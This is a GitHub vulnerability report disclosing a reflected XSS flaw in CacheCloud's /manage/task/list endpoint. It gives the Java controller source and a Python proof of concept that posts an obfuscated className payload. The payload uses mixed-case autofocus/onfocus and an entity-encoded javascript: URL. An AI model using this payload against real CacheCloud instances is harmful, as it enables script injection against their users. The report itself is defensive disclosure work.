
XSS vulnerability on /manage/task/list #374

@NinjaGPT

Description

@NinjaGPT

XSS vulnerability on /manage/task/list

Summary

In the latest version (v3.2) of CacheCloud, the endpoint /manage/task/list does not encode user-controllable parameters when outputting them on the web page, resulting in an XSS vulnerability. This allows attackers to launch XSS attacks against users.

Details

  • SOURCE & SINK
// src/main/java/com/sohu/cache/web/controller/TaskController.java#L40-L69
/**
 * Lists task queues for the management UI: either the queue tree under one
 * task id, or a paged list filtered by {@code taskSearch}.
 *
 * {@code taskSearch} is bound from request parameters (Spring data binding on
 * the handler argument) and is handed to the view unchanged. The report above
 * states that the manage/task/queueList template renders at least its
 * {@code className} field without HTML encoding; that template, not this
 * method, is where output encoding is missing. The numeric parameters
 * (searchTaskId, pageNo, pageSize) are parsed with NumberUtils and so cannot
 * carry markup.
 *
 * NOTE(review): if NumberUtils is the Apache Commons Lang helper, toLong
 * returns a primitive long and the {@code searchTaskId != null} test is
 * always true after boxing -- confirm which NumberUtils is imported.
 *
 * @param request    source of the searchTaskId / pageNo / pageSize parameters
 * @param response   unused
 * @param model      receives page, searchTaskId, taskQueueList and taskActive
 * @param taskSearch filter bound from the request; its page is set here
 * @return the manage/task/queueList view
 */
@RequestMapping({"/list"})
public ModelAndView taskQueueList(HttpServletRequest request, HttpServletResponse response, Model model, TaskSearch taskSearch) {
    Long searchTaskId = NumberUtils.toLong(request.getParameter("searchTaskId"));
    int pageNo = NumberUtils.toInt(request.getParameter("pageNo"), 1);
    int pageSize = NumberUtils.toInt(request.getParameter("pageSize"), 30);

    // A positive task id selects the tree lookup; anything else falls back to
    // the filtered, paged query.
    boolean byTaskId = searchTaskId != null && searchTaskId > 0L;
    List<TaskQueue> queues = byTaskId
            ? this.taskService.getTaskQueueTreeByTaskId(searchTaskId)
            : null;
    int totalCount = byTaskId
            ? queues.size()
            : this.taskService.getTaskQueueCount(taskSearch);

    // The page object is built and attached before the paged query runs, so
    // the query sees the requested window.
    Page page = new Page(pageNo, pageSize, totalCount);
    model.addAttribute("page", page);
    taskSearch.setPage(page);
    if (!byTaskId) {
        queues = this.taskService.getTaskQueueList(taskSearch);
    }

    // Decorate each queue with its step flows for the view.
    for (TaskQueue queue : queues) {
        queue.setTaskStepFlowList(this.taskService.getTaskStepFlowList(queue.getId()));
    }

    model.addAttribute("searchTaskId", searchTaskId);
    model.addAttribute("taskQueueList", queues);
    model.addAttribute("taskActive", SuccessEnum.SUCCESS.value());
    return new ModelAndView("manage/task/queueList");
}
69:

POC

import requests
from requests.sessions import Session
class CustomSession(Session):
    """``requests.Session`` that stamps a fixed header set onto every request.

    The reporter's scanner installs this in place of ``requests.sessions.Session``
    so each POC request carries the same referer/origin (its own test instance),
    User-Agent and cache headers. The signature spells out every parameter of
    ``Session.request`` so positional callers keep working.
    """

    def request(
        self,
        method,
        url,
        params=None,
        data=None,
        headers=None,
        cookies=None,
        files=None,
        auth=None,
        timeout=None,
        allow_redirects=True,
        proxies=None,
        hooks=None,
        stream=None,
        verify=None,
        cert=None,
        json=None,
    ):
        """Merge the fixed headers into ``headers`` and delegate to ``Session.request``.

        A non-empty caller-supplied ``headers`` dict is updated in place (the
        caller sees the additions); an empty or missing one is replaced by a
        fresh dict. Fixed headers overwrite same-named caller headers.
        """
        merged_headers = headers or dict()
        merged_headers.update({
            'referer': 'http://34.169.199.145:40101/admin/app/list',
            'User-Agent': 'oxpecker',
            'accept-language': 'en-US',
            'x-requested-with': 'XMLHttpRequest',
            'origin': 'http://34.169.199.145:40101',
            'upgrade-insecure-requests': '1',
            'pragma': 'no-cache',
            'cache-control': 'no-cache',
            'accept-encoding': 'gzip, deflate',
        })
        return super().request(
            method=method,
            url=url,
            params=params,
            data=data,
            headers=merged_headers,
            cookies=cookies,
            files=files,
            auth=auth,
            timeout=timeout,
            allow_redirects=allow_redirects,
            proxies=proxies,
            hooks=hooks,
            stream=stream,
            verify=verify,
            cert=cert,
            json=json,
        )
# Route every requests.* helper through the header-stamping session above.
requests.sessions.Session = CustomSession
# ================================== Poc Start ===================================
import requests
# The reporter's own test instance of CacheCloud, not a third-party host.
url: str = 'http://34.169.199.145:40101/manage/task/list'
# 'className' is bound into the TaskSearch handler argument and, per the
# report, echoed into the queueList page without HTML encoding; the value
# closes an attribute and adds an event handler, so an unencoded reflection
# of this parameter in the response text confirms the finding. The numeric
# parameters are the controller's defaults. A request whose className carries
# quotes or an on*= handler is also an easy signal for request logging / WAF
# rules while the template fix is pending.
payload: dict[str, str | int] = {'className': 'X" tabindex="1" autofOCUs ONfocus="location=\'&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#122;&#97;&#115;&#116;&#45;&#120;&#115;&#115;&#34;&#41;\'"//', 'searchTaskId': 0, 'pageNo': 1, 'pageSize': 30}
# verify=False skips TLS verification (the target is plain http anyway);
# allow_redirects=False keeps the raw response so the reflection is visible.
response = requests.post(url, data=payload, verify=False, allow_redirects=False)
print(f'Status Code: {response.status_code}')
print(f'Text: {response.text}')
# =================================== Poc End ====================================
  • Screenshot
Image
